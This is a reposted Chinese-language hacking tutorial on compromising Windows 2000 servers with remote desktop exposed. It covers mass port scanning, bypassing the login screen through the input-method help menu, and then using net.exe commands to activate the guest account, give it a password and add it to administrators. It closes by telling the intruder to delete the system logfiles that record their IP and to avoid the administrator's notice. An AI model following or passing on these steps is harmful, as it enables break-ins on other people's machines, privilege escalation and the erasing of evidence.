轉自INTERNET
所謂肉雞,顧名思義,就是猶如放在粘板上的雞一樣,任你宰割,最近許多朋友問我關於3389肉雞的問題,我就在這做個簡易的介紹。
首先去網站下載個掃瞄工具(只要能掃端口就行),然後隨便掃個C類網,包你能找一大堆。然後運行客戶端連接管理器,添入服務器的ip地址與服務器連接,幾秒鐘後屏幕上顯示出win2000的登陸界面,用CTRL+SHIFT快速切換輸入法,切換至全拼,這時在登錄界面左下角將出現輸入法狀態條。
點鼠標右鍵(如果其幫助菜單發灰,就趕快趕下家吧,人家打補丁了),點幫助,點輸入法入門;選擇"選項"按右鍵,會彈出一個菜單,打開「跳至URL」。此時將出現WIN2000的系統安裝路徑和要求我們填入的路徑的空白欄(先看一下上面發灰的URL路徑是什麼,一般在C盤)輸入c:\winnt\system32然後按「確定」,於是我們就成功地繞過了身份驗證,進入了系統的SYSTEM32目錄。
在該目錄下找到"net.exe",為"net.exe"創建一個快捷方式,右鍵點擊該快捷方式,在「屬性」->「目標」->c:\winnt\system32\net.exe後面留一個空格,然後填上
"user guest /active :yes"(激活guest賬戶)然後按確定。
運行此快捷方式,然後又修改該快捷方式,填入"user guest hackart",運行,於是guest便有了密碼。(其中hackart為guest密碼)
最後,再次修改,填入「localgroup administrators guest /add,將guest提升為系統管理員。
當然你也可以自己創建一個帳戶,但這樣容易引起網管的懷疑。(除非那網管是白癡)在system32該目錄下找到"net.exe",為"net.exe"創建一個快捷方式,右鍵點擊該快捷方式,在「屬性」->「目標」->c:\winnt\system32\net.exe後面留一個空格,然後填上"user 用戶名 密碼/add",創建一個新賬號,運行後按照以上步驟提升新帳號為系統管理員。點鼠標右鍵選擇屬性,將目標改為: c:\winnt\system32\net.exe localgroup administrators 用戶名 /add再運行一次,這樣就可以了,然後你可以。。。。。不用我教了吧。。呵呵
結束以後刪除你自己建立的快捷方式,然後刪除winnt\system32\logfiles下邊的日誌文件。(你自己打開看看是不是有你的IP地址記錄,呵呵)
需要注意的是:如果對方管理員正在使用終端服務管理器,他將看到你所打開的進程id,你的ip和機器名,以上步驟在完成過程中只有一分鐘的時間,在這一分鐘內如果你不能完成上述操作,你只能再重新連接。